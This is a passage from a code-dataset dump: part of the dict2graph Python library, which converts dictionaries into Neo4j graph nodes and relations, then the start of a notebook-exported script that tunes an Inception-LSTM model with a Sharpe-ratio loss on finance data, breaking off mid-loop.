interpret_single_props_as_labels\n\n self._node_cache: List[Node] = []\n self._node_cache_feeder: List[Node] = []\n\n self._rel_cache: List[Relation] = []\n self._rel_cache_feeder: List[Node] = []\n self._nodeSets: Dict[Tuple, NodeSet] = {}\n self._relSets: Dict[Tuple, RelationshipSet] = {}\n self.matcher_and_node_transformers_stack = MatcherTransformersContainerStack([])\n self.matcher_and_rel_transformers_stack = MatcherTransformersContainerStack([])\n\n def add_transformation(\n self,\n transformer: Union[\n _NodeTransformerBase,\n _RelationTransformerBase,\n List[Union[_NodeTransformerBase, _RelationTransformerBase]],\n ],\n ):\n \"\"\"Add one or a list of [`Transformers`](/use_transformers.md) to the Dict2Graph instance.\n Transformers can re-model your graph befor writing it to a Neo4j database.\n\n **usage**:\n ```python\n from dict2graph import Dict2graph, Transformer, NodeTrans\n\n d2g = Dict2Graph()\n d2g.add_transformation(\n Transformer.match_nodes(\"article\").do(NodeTrans.OverrideLabel(\"book\"))\n )\n ```\n\n Args:\n transformer (Union[ _NodeTransformerBase, _RelationTransformerBase, List[Union[_NodeTransformerBase, _RelationTransformerBase]], ]): A list or single instance of a Transformer\n\n \"\"\"\n\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_transformation(trans)\n return\n if self._get_transformer_class(transformer) == _NodeTransformerBase:\n self.add_node_transformation(transformer)\n\n elif self._get_transformer_class(transformer) == _RelationTransformerBase:\n self.add_relation_transformation(transformer)\n else:\n raise ValueError(\n f\"Expected transformer of subclass '{_NodeTransformerBase}' or '{_RelationTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}')\"\n )\n\n def _get_transformer_class(\n self, transformer: Union[_NodeTransformerBase, _RelationTransformerBase]\n ) -> Union[Type[_NodeTransformerBase], type[_RelationTransformerBase]]:\n if issubclass(transformer.__class__, _NodeTransformerBase) and issubclass(\n transformer.__class__, _RelationTransformerBase\n ):\n # We got a generic transformer. we have to look at the matcher to determine the transformer type.\n if isinstance(transformer.matcher, Transformer.RelTransformerMatcher):\n return _RelationTransformerBase\n elif isinstance(transformer.matcher, Transformer.NodeTransformerMatcher):\n return _NodeTransformerBase\n elif issubclass(transformer.__class__, _NodeTransformerBase):\n return _NodeTransformerBase\n elif issubclass(transformer.__class__, _RelationTransformerBase):\n return _RelationTransformerBase\n\n def add_node_transformation(\n self, transformer: Union[_NodeTransformerBase, List[_NodeTransformerBase]]\n ):\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_node_transformation(trans)\n return\n if transformer.matcher is None:\n raise ValueError(f\"No matcher added to {transformer}\")\n if not issubclass(transformer.__class__, _NodeTransformerBase):\n raise ValueError(\n f\"Expected transformer of subclass '{_NodeTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}').\\nMaybe you wanted to use function `Dict2graph.add_relation_transformation()` instead of `add_node_transformation`?\"\n )\n elif transformer.matcher.__class__ != Transformer.NodeTransformerMatcher:\n raise ValueError(\n f\"Expected transformer matcher of class '{Transformer.NodeTransformerMatcher}', got '{transformer.matcher.__class__}'.\\nMaybe you accidentally added a relationship matcher instead of a node matcher (`match_nodes()` vs. `match_rels()`) while using `Dict2graph.add_node_transformation()`?\"\n )\n else:\n transformer.d2g = self\n self.matcher_and_node_transformers_stack.add_container(transformer)\n\n def add_relation_transformation(\n self,\n transformer: Union[_RelationTransformerBase, List[_RelationTransformerBase]],\n ):\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_relation_transformation(trans)\n return\n elif not issubclass(transformer.__class__, _RelationTransformerBase):\n raise ValueError(\n f\"Expected transformer of subclass '{_RelationTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}').\\nMaybe you wanted to use function `Dict2graph.add_node_transformation()` instead of `add_relation_transformation`?\"\n )\n elif transformer.matcher.__class__ != Transformer.RelTransformerMatcher:\n raise ValueError(\n f\"Expected transformer matcher of class '{Transformer.RelTransformerMatcher}', got '{transformer.matcher.__class__}'.\\nMaybe you accidentally added a node matcher instead of a relationship matcher (`match_rels()` vs. `match_nodes()`) while using `Dict2graph.add_relation_transformation()`?\"\n )\n else:\n self.matcher_and_rel_transformers_stack.add_container(transformer)\n\n def parse(\n self, data: Dict, root_node_labels: Union[str, List[str]] = None\n ) -> \"Dict2graph\":\n \"\"\"Submit your actual data (as dict) to dict2graph. The data will be transformed instantly but not yet pushed to your Neo4j database.\n It will land in a dict2graph internal cache. You can run multiple `Dict2Graph.parse()` passes before pushing the data to your Neo4j database.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"myDictKey\":\"myValue\"}\n d2g = Dict2Graph()\n d2g.parse(data)\n ```\n Args:\n data (Dict): Your data as a dict with only basic typed valued, as a rule of thumb it should be json compatible.\n If you have json string you may use the build-in python module \"json\" in before(`json.loads(your_data_as_json)`)\n root_node_labels (Union[str, List[str]], optional): Dict2graph tries to determine a sensible root node.\n But that is not possible in many cases and dict2graph\n will return to the default label in `Dict2graph.root_node_default_labels`.\n with `Dict2graph.parse(root_node_labels)` you can force a root label.\n Defaults to None.\n\n Raises:\n ValueError: When data is not parsable.\n\n Returns:\n Dict2graph: Returns itself to be able to chains commands like `dict2graph_ints.parse(data).parse(data2).create(NEO4J_DRIVER)`\n \"\"\"\n if root_node_labels is None:\n if isinstance(data, dict) and len(data.keys()) == 1:\n # we only have one key and therefore only one Node on the top-/root-level. We dont need a root Node to connect the toplevels nodes.\n root_node_labels = [list(data.keys())[0]]\n data = data[root_node_labels[0]]\n else:\n root_node_labels = self.root_node_default_labels\n if isinstance(root_node_labels, str):\n root_node_labels = [root_node_labels]\n\n if isinstance(data, str):\n data_obj = json.loads(data)\n else:\n data_obj = data\n if not isinstance(data_obj, dict) and not isinstance(data_obj, list):\n raise ValueError(\n \"Expected json compatible object like a dict or list. got {}\".format(\n type(data_obj).__name__\n )\n )\n if isinstance(data_obj, dict):\n\n root_node = self._parse_traverse_dict_fragment(\n labels=root_node_labels, data=data_obj, parent_node=None\n )\n\n elif isinstance(data_obj, list):\n root_node = self._parse_traverse_list_fragment(\n labels=root_node_labels, data=data_obj, parent_node=None\n )\n self._prepare_root_node(root_node)\n\n self._flush_cache()\n return self\n\n def merge(\n self,\n graph: Union[Graph, Driver],\n database: str = None,\n create_merge_indexes: bool = True,\n ):\n \"\"\"Push the data to a Neo4h database, with a merge operation.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n from neo4j import GraphDatabase\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"car\":{\"wheels\":\"4\"}}\n data2 = {\"car\":{\"wheels\":\"4\"}}\n d2g = Dict2Graph()\n d2g.parse(data)\n d2g.parse(dat2)\n d2g.merge(GraphDatabase.driver(\"neo4j://localhost\"))\n ```\n\n Will result in one node `(:car{wheels:4})` because the two datasets where merged (based on same labels and properties).\n\n Args:\n graph (Union[Graph, Driver]): A [`neo4j.GraphDatabase` instance](https://neo4j.com/docs/api/python-driver/current/)\n or a [`py2neo.Graph` instance](https://py2neo.org/2021.1/workflow.html#graph-objects)\n database (str, optional): Name of the Neo4j [database](https://neo4j.com/docs/cypher-manual/current/databases/). Defaults to None which will eb the default \"neo4j\" db.\n create_merge_indexes (bool, optional): _description_. Defaults to True.\n \"\"\"\n\n if create_merge_indexes:\n self.create_indexes_for_merge_keys(graph)\n for nodes in self._nodeSets.values():\n nodes.merge(graph, database=database)\n for rels in self._relSets.values():\n rels.merge(graph, database=database)\n\n def create(\n self,\n graph: Union[Graph, Driver],\n database: str = None,\n ):\n \"\"\"Push the data to a Neo4h database, with a create operation.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n from neo4j import GraphDatabase\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"car\":{\"wheels\":\"4\"}}\n data2 = {\"car\":{\"wheels\":\"4\"}}\n d2g = Dict2Graph()\n d2g.parse(data)\n d2g.parse(dat2)\n d2g.create(GraphDatabase.driver(\"neo4j://localhost\"))\n ```\n\n Will result in two nodes `(:car{wheels:4})`.\n\n Args:\n graph (Union[Graph, Driver]): A [Neo4j python driver instance](https://neo4j.com/docs/api/python-driver/current/)\n or a [`py2neo.Graph` instance](https://py2neo.org/2021.1/workflow.html#graph-objects)\n database (str, optional): Name of the Neo4j [database](https://neo4j.com/docs/cypher-manual/current/databases/). Defaults to None which will eb the default \"neo4j\" db.\n \"\"\"\n for nodes in self._nodeSets.values():\n nodes.create(graph, database=database)\n for rels in self._relSets.values():\n rels.create(graph, database=database)\n\n def create_indexes_for_merge_keys(self, graph: Union[Graph, Driver]):\n for nodes in self._nodeSets.values():\n\n nodes.create_index(graph)\n\n def _prepare_root_node(self, node: Node):\n node.is_root_node = True\n if len(node.keys()) == 0:\n node[self.root_node_default_id_property_name] = node.get_hash(\n include_children_data=True\n )\n\n node.merge_property_keys = [self.root_node_default_id_property_name]\n\n def _parse_traverse_dict_fragment(\n self, data: Dict, parent_node: Node, labels: List[str] = None\n ) -> Node:\n new_node = Node(labels=labels, source_data=data, parent_node=parent_node)\n new_child_nodes: List[Node] = []\n new_rels: List[Relation] = []\n for key, val in data.items():\n if self._is_basic_attribute_type(val):\n # value is a simple type. attach as property to node\n new_node[key] = val\n else:\n # value is dict or list in itself and therefore one or multiple child nodes\n r = None\n n = None\n if isinstance(val, dict):\n if self._is_named_obj(val):\n n = self._parse_traverse_dict_fragment(\n labels=list(val.keys()),\n data=val[list(val.keys())[0]],\n parent_node=new_node,\n )\n r = Relation(start_node=new_node, end_node=n, relation_type=key)\n else:\n n = self._parse_traverse_dict_fragment(\n labels=[key], data=val, parent_node=new_node\n )\n elif isinstance(val, list):\n n = self._parse_traverse_list_fragment(\n labels=[key], data=val, parent_node=new_node\n )\n elif val is not None:\n raise ValueError(\n f\"Expected dict val to be a None, basic type, a list or a dict. Got `{type(val)}` for key '{key}' value '{val}'\"\n )\n if n is not None:\n new_child_nodes.append(n)\n if r is None:\n r = Relation(\n start_node=new_node,\n end_node=n,\n )\n new_rels.append(r)\n self._node_cache.append(new_node)\n self._rel_cache.extend(new_rels)\n return new_node\n\n def _parse_traverse_list_fragment(\n self, labels: List[str], parent_node: Node, data: Dict\n ) -> Node:\n\n # create/set list root node. this is the node on which the list items will attach to\n # the parent_node is the default root\n\n list_root_hub_node: Node = Node(\n labels=labels,\n source_data=data,\n parent_node=parent_node,\n )\n self._set_list_root_hub_node_labels(list_root_hub_node)\n list_root_hub_node.is_list_list_hub = True\n self._node_cache.append(list_root_hub_node)\n # parse nodes\n new_list_item_nodes: List[Node] = []\n for index, obj in enumerate(data):\n if self._is_basic_attribute_type(obj):\n n = Node(labels, source_data=obj, parent_node=list_root_hub_node)\n\n n[self.simple_list_item_data_property_name] = obj\n self._node_cache.append(n)\n new_list_item_nodes.append(n)\n elif self._is_named_obj(obj):\n obj_label = list(obj.keys())[0]\n obj_data = obj[obj_label]\n new_list_item_nodes.append(\n self._parse_traverse_dict_fragment(\n labels=obj_label, data=obj_data, parent_node=list_root_hub_node\n )\n )\n elif isinstance(obj, dict):\n new_list_item_nodes.append(\n self._parse_traverse_dict_fragment(\n labels=labels, data=obj, parent_node=list_root_hub_node\n )\n )\n elif isinstance(obj, list):\n new_list_item_nodes.append(\n self._parse_traverse_list_fragment(\n labels=labels, data=obj, parent_node=list_root_hub_node\n )\n )\n\n # create relations to list root node\n child_ids: List[str] = []\n\n for index, node in enumerate(new_list_item_nodes):\n if node is None:\n continue\n self._set_list_item_node_labels(node)\n node.is_list_list_item = True\n child_ids.append(node.id)\n r = Relation(\n start_node=list_root_hub_node,\n end_node=node,\n )\n\n r[self.list_item_relation_index_property_name] = index\n node.parent_node = list_root_hub_node\n self._rel_cache.append(r)\n #\n\n list_root_hub_node[\n self.list_hub_id_property_name\n ] = list_root_hub_node.get_hash(include_children_data=True)\n list_root_hub_node.merge_property_keys = [self.list_hub_id_property_name]\n\n return list_root_hub_node\n\n def _is_empty(self, val):\n if not val:\n return True\n if isinstance(val, str) and val.upper() in [\"\", \"NULL\"]:\n return True\n return False\n\n def _is_basic_attribute_type(self, val):\n if isinstance(val, (str, int, float, bool)):\n return True\n else:\n return False\n\n def _is_named_obj(self, data: Dict):\n \"\"\"If an object is a one-keyd dict on the first layer and there is a dict behind this key,\n we determine that this one key is the label/type and the inner dict are the props\n\n Args:\n data (List): _description_\n\n Returns:\n _type_: _description_\n \"\"\"\n # {\"person\":{\"name\":\"tom\",\"lastname\":\"schilling\"}} -> we know its a person\n # {\"name\":\"tom\",\"lastname\":\"schilling\"} -> Could be a person or a lama\n # {\"client\":{\"name\":\"tom\",\"lastname\":\"schilling\"},\"cert\":\"yes\"} -> -> Could be a person or a computer\n if not self.interpret_single_props_as_labels:\n return False\n if (\n isinstance(data, dict)\n and len(data.keys()) == 1\n and isinstance(data[list(data.keys())[0]], dict)\n ):\n return True\n return False\n\n def _set_list_root_hub_node_labels(self, node: Node) -> str:\n addi_labels = [\n l.replace(\"{{ITEM_PRIMARY_LABEL}}\", node.primary_label)\n for l in self.list_hub_additional_labels\n ]\n addi_labels = [\n l.replace(\"{{ITEM_LABELS}}\", \"_\".join(node.primary_label))\n for l in addi_labels\n ]\n\n node.labels = node.labels + addi_labels\n\n def _set_list_item_node_labels(self, node: Node) -> str:\n node.labels = node.labels + self.list_item_additional_labels\n\n def _manifest_node_from_cache(self, cached_node: Node):\n node_set: NodeSet = self._get_or_create_nodeSet(cached_node)\n if self.create_ids_for_empty_nodes and cached_node.id is None:\n cached_node[\n self.empty_node_default_id_property_name\n ] = cached_node.get_hash(include_children_data=True)\n cached_node.merge_property_keys = [self.empty_node_default_id_property_name]\n node_set.add_node(cached_node)\n\n def _get_or_create_nodeSet(self, node: Node) -> NodeSet:\n node_type_fingerprint = (\n frozenset(node.labels),\n frozenset(node.merge_property_keys),\n )\n if node_type_fingerprint not in self._nodeSets:\n self._nodeSets[node_type_fingerprint] = NodeSet(\n labels=node.labels,\n merge_keys=node.merge_property_keys\n if node.merge_property_keys\n else list(node.keys()),\n )\n return self._nodeSets[node_type_fingerprint]\n\n def _manifest_rel_from_cache(self, cached_relation: Relation):\n rel_set: RelationshipSet = self._get_or_create_relSet(cached_relation)\n rel_set.add_relationship(\n start_node_properties=cached_relation.start_node,\n end_node_properties=cached_relation.end_node,\n properties=cached_relation,\n )\n\n def _get_or_create_relSet(self, relation: Relation) -> RelationshipSet:\n rel_id = (\n frozenset(relation.start_node.labels),\n frozenset(relation.start_node.merge_property_keys),\n relation.relation_type,\n frozenset(relation.end_node.labels),\n frozenset(relation.end_node.merge_property_keys),\n )\n\n if rel_id not in self._relSets:\n self._relSets[rel_id] = RelationshipSet(\n rel_type=relation.relation_type,\n start_node_labels=relation.start_node.labels,\n end_node_labels=relation.end_node.labels,\n start_node_properties=relation.start_node.merge_property_keys,\n end_node_properties=relation.end_node.merge_property_keys,\n )\n return self._relSets[rel_id]\n\n def add_node_to_cache(self, node: Node):\n \"\"\"Add a new [dict2graph.Node][] to the dict2graph cache.\n This method is only relevant for [`Transformers`](/use_transformers).\n\n You will propably only need it of you create [custom Transformers](/diy_transformer).\n\n Args:\n node (Node): The [dict2graph.Node][] to add.\n \"\"\"\n self._node_cache_feeder.append(node)\n\n def add_rel_to_cache(self, rel: Relation):\n \"\"\"Add a new [dict2graph.Relation][] to the dict2graph cache.\n This method is only relevant for [`Transformers`](/use_transformers).\n\n You will propably only need it of you create [custom Transformers](/diy_transformer).\n\n Args:\n node (Node): The [dict2graph.Relation][] to add.\n \"\"\"\n self._rel_cache_feeder.append(rel)\n\n def _flush_cache(self):\n self._feed_cache_with_new_nodes_and_rels()\n self._run_transformations()\n for node in self._node_cache:\n if not node.deleted:\n self._manifest_node_from_cache(node)\n for rel in self._rel_cache:\n if not rel.deleted:\n self._manifest_rel_from_cache(rel)\n self._node_cache = []\n self._rel_cache = []\n\n def _run_transformations(self):\n for (\n matcher_trans_node_container\n ) in self.matcher_and_node_transformers_stack.containers:\n for node in self._node_cache:\n if (\n matcher_trans_node_container.matcher._match(node)\n and not node.deleted\n ):\n for trans in matcher_trans_node_container.transformers:\n trans._run_custom_node_match_and_transform(node)\n self._feed_cache_with_new_nodes_and_rels()\n\n for (\n matcher_trans_rel_container\n ) in self.matcher_and_rel_transformers_stack.containers:\n for rel in self._rel_cache:\n if matcher_trans_rel_container.matcher._match(rel) and not rel.deleted:\n for trans in matcher_trans_rel_container.transformers:\n trans._run_custom_rel_match_and_transform(rel)\n\n self._feed_cache_with_new_nodes_and_rels()\n\n def _feed_cache_with_new_nodes_and_rels(self):\n self._node_cache.extend(self._node_cache_feeder)\n self._node_cache_feeder = []\n self._rel_cache.extend(self._rel_cache_feeder)\n self._rel_cache_feeder = []\n","repo_name":"DZD-eV-Diabetes-Research/dict2graph","sub_path":"dict2graph/dict2graph.py","file_name":"dict2graph.py","file_ext":"py","file_size_in_byte":27347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12377930869","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\n\n### load Data \nimport tensorflow as tf\nimport gzip\nfrom time import time\nfrom tensorflow.python.client import device_lib\nprint(device_lib.list_local_devices())\nimport keras as ks\nimport keras\nimport numpy as np\nimport keras.backend as K\nfrom random import random\nfrom random import randint\nfrom numpy import array\nfrom numpy import zeros\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import TimeDistributed\nfrom tensorflow.keras.layers import Conv1D\nfrom tensorflow.keras.layers import MaxPooling1D\nfrom tensorflow.keras.layers import AveragePooling1D\nfrom tensorflow.keras.callbacks import LambdaCallback\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.layers import concatenate\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.utils import multi_gpu_model\nimport multiprocessing\n#from eli5.sklearn import PermutationImportance\n#from numba import jit\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.callbacks import ModelCheckpoint\n#from keras.callbacks import TensorBoard\nfrom hyperopt import Trials, STATUS_OK, tpe\nfrom hyperas import optim\nfrom hyperas.distributions import choice\nimport numpy as np\nimport pickle \nimport os\nfrom keras.preprocessing.sequence import TimeseriesGenerator\n\n\n# In[5]:\n\n\n\nimport multiprocessing\n#import dask.dataframe as dk\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\n\n#import matplotlib.pyplot as plt\nidx=pd.IndexSlice\nfrom sklearn.metrics import make_scorer, r2_score,accuracy_score,precision_score\nfrom sklearn.externals import joblib\nimport os\nimport gc\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom tqdm import tqdm\nimport inspect \n\n\n# In[6]:\n\n\n\nmultiprocessing.cpu_count()\n\n\n# In[ ]:\n\n\n\ndef data():\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n Year=readConfigForLoading['Year'][0]\n lookBackYear=readConfigForLoading['lookBackYear'][0]\n LSTMWindow = readConfigForLoading['LSTMWindow'][0]\n NumberOfFeatures = readConfigForLoading['NumberOfFeatures'][0]\n \n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(Year) +'lookBackYear' +str(lookBackYear) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n X_train=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(Year) +'lookBackYear' +str(lookBackYear) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n y_train=pickle.load( handle)\n\n \n #y_train=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempYtrainHyper5.pkl.npy')\n #X_test=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempXtestHyper5.pkl.npy')\n #y_test=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempYtestHyper5.pkl.npy')\n print(1)\n #, X_test, y_test\n return X_train, y_train\n\n\n# In[ ]:\n\n\ndef create_model(X_train, y_train):\n \n def inception_module(layer_in, f1, f2, f3):\n\n conv1 =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n \n conv3 =TimeDistributed( Conv1D(f2, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv3 = TimeDistributed(Conv1D(f2, kernel_size=3, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv3)\n \n conv5 =TimeDistributed( Conv1D(f3, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv5 = TimeDistributed(Conv1D(f3, kernel_size=5, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv5)\n \n pool = TimeDistributed(AveragePooling1D(pool_size=3, strides=1, padding='same'))(layer_in)\n pool =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(pool)\n layer_out = concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n \n print(1)\n APPENDweights=[]\n size=377\n\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n length = readConfigForLoading['LSTMWindow'][0]\n n_features = readConfigForLoading['NumberOfFeatures'][0]\n def simple_sharpe_loss_function(y_actual,y_predicted):\n M=52\n M=K.cast(M,dtype='float32')\n sharpe_loss_value=K.mean(y_actual*y_predicted)/K.std(y_actual*y_predicted)*K.sqrt(M)\n return sharpe_loss_value\n #,'three','four','five','six','seven'\n visible = Input(shape=(None,n_features,1))\n layer=visible\n deepInceptionLayers={{choice(['one'])}}\n if deepInceptionLayers == 'one':\n NumberOfLayers=1\n elif deepInceptionLayers == 'two':\n NumberOfLayers=2\n elif deepInceptionLayers == 'three':\n NumberOfLayers=3\n elif deepInceptionLayers == 'four':\n NumberOfLayers=4\n elif deepInceptionLayers == 'five':\n NumberOfLayers=5\n elif deepInceptionLayers == 'six':\n NumberOfLayers=6\n elif deepInceptionLayers == 'seven':\n NumberOfLayers=7\n \n filter1D={{choice([1,3])}}\n filter3D={{choice([1,3])}}\n filter5D={{choice([1,3])}}\n# pool_size={{choice([ 1,2])}}\n momentum= 0.9\n for ii in np.arange(0,NumberOfLayers):\n layer = inception_module(layer, f1=filter1D, f2=filter3D, f3=filter5D)\n layer = TimeDistributed(BatchNormalization(momentum=momentum))(layer)\n# if {{choice(['one','two'])}} == 'one':\n# layer = TimeDistributed(MaxPooling1D(pool_size=pool_size))(layer)\n# else:\n# layer = TimeDistributed(AveragePooling1D(pool_size=pool_size))(layer)\n # 10,20,30,40 \n layer = TimeDistributed(Conv1D(1, kernel_size={{choice([20])}}, activation='relu', kernel_initializer='glorot_normal'))(layer)\n layer = TimeDistributed(Flatten())(layer)\n layer= LSTM(units={{choice([5,10,20,30,40,60,80,100,120])}}, kernel_initializer='glorot_normal',bias_initializer='glorot_normal',recurrent_dropout={{choice([0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8])}})(layer)\n if {{choice(['one','two'])}}=='one':\n layer = Dense(units={{choice([5,10,20])}},activation='relu',)(layer)\n layer = Dense(1, activation='linear')(layer)\n#dropout={{choice([0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8])}}\n model = Model(inputs=visible,outputs=layer) \n opt=Adam(lr={{choice([0.00001,0.0001,0.001,0.01,0.1])}},clipnorm={{choice([0.0001,0.001,0.01,0.1,1])}})\n model.compile(loss=simple_sharpe_loss_function, optimizer=opt)\n model.summary()\n es=EarlyStopping(monitor='val_loss',mode='min',verbose=1,patience=25)\n checkpoint = ModelCheckpoint('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/BestModel.hdf5', monitor='val_loss', verbose=1, save_best_only=True, mode='min',period=10) \n callback_List = [es, checkpoint]\n result=model.fit(X_train, y_train, batch_size=6000, epochs=5,callbacks = callback_List, validation_split=0.1,verbose=2)\n validation_acc = np.amin(result.history['val_loss'])\n print('Best validation acc of epoch:', -validation_acc)\n return {'loss': validation_acc,'status': STATUS_OK,'model':model}\n\n\n# In[ ]:\n\n\ndef continueToTrainModel(params):\n \n def inception_module(layer_in, f1, f2, f3):\n\n conv1 =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n \n conv3 =TimeDistributed( Conv1D(f2, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv3 = TimeDistributed(Conv1D(f2, kernel_size=3, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv3)\n \n conv5 =TimeDistributed( Conv1D(f3, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv5 = TimeDistributed(Conv1D(f3, kernel_size=5, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv5)\n \n pool = TimeDistributed(AveragePooling1D(pool_size=3, strides=1, padding='same'))(layer_in)\n pool =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(pool)\n layer_out = concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n \n print(1)\n APPENDweights=[]\n size=377\n #,'two','three','four','five','six','seven'\n clipnormToChoice = [0.0001,0.001,0.01,0.1,1,10]\n deepInceptionLayersToPick = ['one']\n filter1D = [1,3]\n filter1D_1 = [1,3]\n filter1D_2 = [1,3]\n kernel_size = [2]\n learningRateToChoice = [0.00001,0.0001,0.001,0.01,0.1,1]\n# pool_size = [1]\n# pool_stride = [1]\n\n recurrent_dropout = [0,0.1,0.2,0.3,0.4,0.5]\n recurrent_dropout_1 = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8]\n recurrent_dropout_2 =['one','two']\n unitsToChoice = [5, 10, 20, 40, 60, 80, 100, 120]\n units_1 = [5, 10, 20]\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n length = readConfigForLoading['LSTMWindow'][0]\n n_features = readConfigForLoading['NumberOfFeatures'][0]\n def simple_sharpe_loss_function(y_actual,y_predicted):\n M=52\n M=K.cast(M,dtype='float32')\n sharpe_loss_value=K.mean(y_actual*y_predicted)/K.std(y_actual*y_predicted)*K.sqrt(M)\n return sharpe_loss_value\n\n visible = Input(shape=(None,n_features,1))\n layer=visible\n deepInceptionLayers=deepInceptionLayersToPick[params['deepInceptionLayers']]\n if deepInceptionLayers == 'one':\n NumberOfLayers=1\n elif deepInceptionLayers == 'two':\n NumberOfLayers=2\n elif deepInceptionLayers == 'three':\n NumberOfLayers=3\n elif deepInceptionLayers == 'four':\n NumberOfLayers=4\n elif deepInceptionLayers == 'five':\n NumberOfLayers=5\n elif deepInceptionLayers == 'six':\n NumberOfLayers=6\n elif deepInceptionLayers == 'seven':\n NumberOfLayers=7\n \n filter1D=filter1D[params['filter1D']]\n filter3D=filter1D_1[params['filter1D_1']]\n filter5D=filter1D_2[params['filter1D_2']]\n# pool_size={{choice([3,5,9,16,25,34])}}\n #pool_stride={{choice([None,1, 2,3])}}\n momentum= 0.9\n for ii in np.arange(0,NumberOfLayers):\n layer = inception_module(layer, f1=filter1D, f2=filter3D, f3=filter5D)\n layer = TimeDistributed(BatchNormalization(momentum=momentum))(layer)\n# if {{choice(['one','two'])}} == 'one':\n# layer = MaxPooling1D(pool_size=pool_size)(layer)\n# else:\n# layer = AveragePooling1D(pool_size=pool_size)(layer)\n \n layer = TimeDistributed(Conv1D(1, kernel_size=kernel_size[params['kernel_size']], activation='relu', kernel_initializer='glorot_normal'))(layer)\n layer = TimeDistributed(Flatten())(layer)\n layer= LSTM(units=unitsToChoice[params['units']], kernel_initializer='glorot_normal',bias_initializer='glorot_normal',recurrent_dropout=recurrent_dropout_1[params['recurrent_dropout']])(layer)\n if recurrent_dropout_2[params['recurrent_dropout_1']] =='one':\n layer = Dense(units=units_1[params['units_1']],activation='relu')(layer)\n layer = Dense(1, activation='linear')(layer)\n\n model = Model(inputs=visible,outputs=layer) \n opt=Adam(lr=learningRateToChoice[params['lr']],clipnorm=clipnormToChoice[params['clipnorm']])\n model.compile(loss=simple_sharpe_loss_function, optimizer=opt)\n model.summary()\n\n return model\n\n\n# In[ ]:\n\n\n\nmodelName='InceptionLSTM'\ngc.collect()\npredictionPeriod=1\nLSTMWindow=21\nyearsBack=np.arange(1,2)\nNumberOfFeatures=100\nepochs=5\nbatch_size=4000\nfor jj in yearsBack:\n years=np.arange(2008,2015)\n best_model = None\n for ii in years:\n print(years)\n lowYear=ii-jj\n config=pd.DataFrame([[ii, jj ,LSTMWindow, NumberOfFeatures]],columns=['Year','lookBackYear','LSTMWindow','NumberOfFeatures'])\n config.to_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n if best_model is None:\n best_run, best_model = optim.minimize(model=create_model,\n data=data,\n algo=tpe.suggest,\n max_evals=2,\n trials=Trials())\n print('best model over the optmization')\n print(best_run)\n model=best_model\n \n else:\n model=continueToTrainModel(best_run)\n 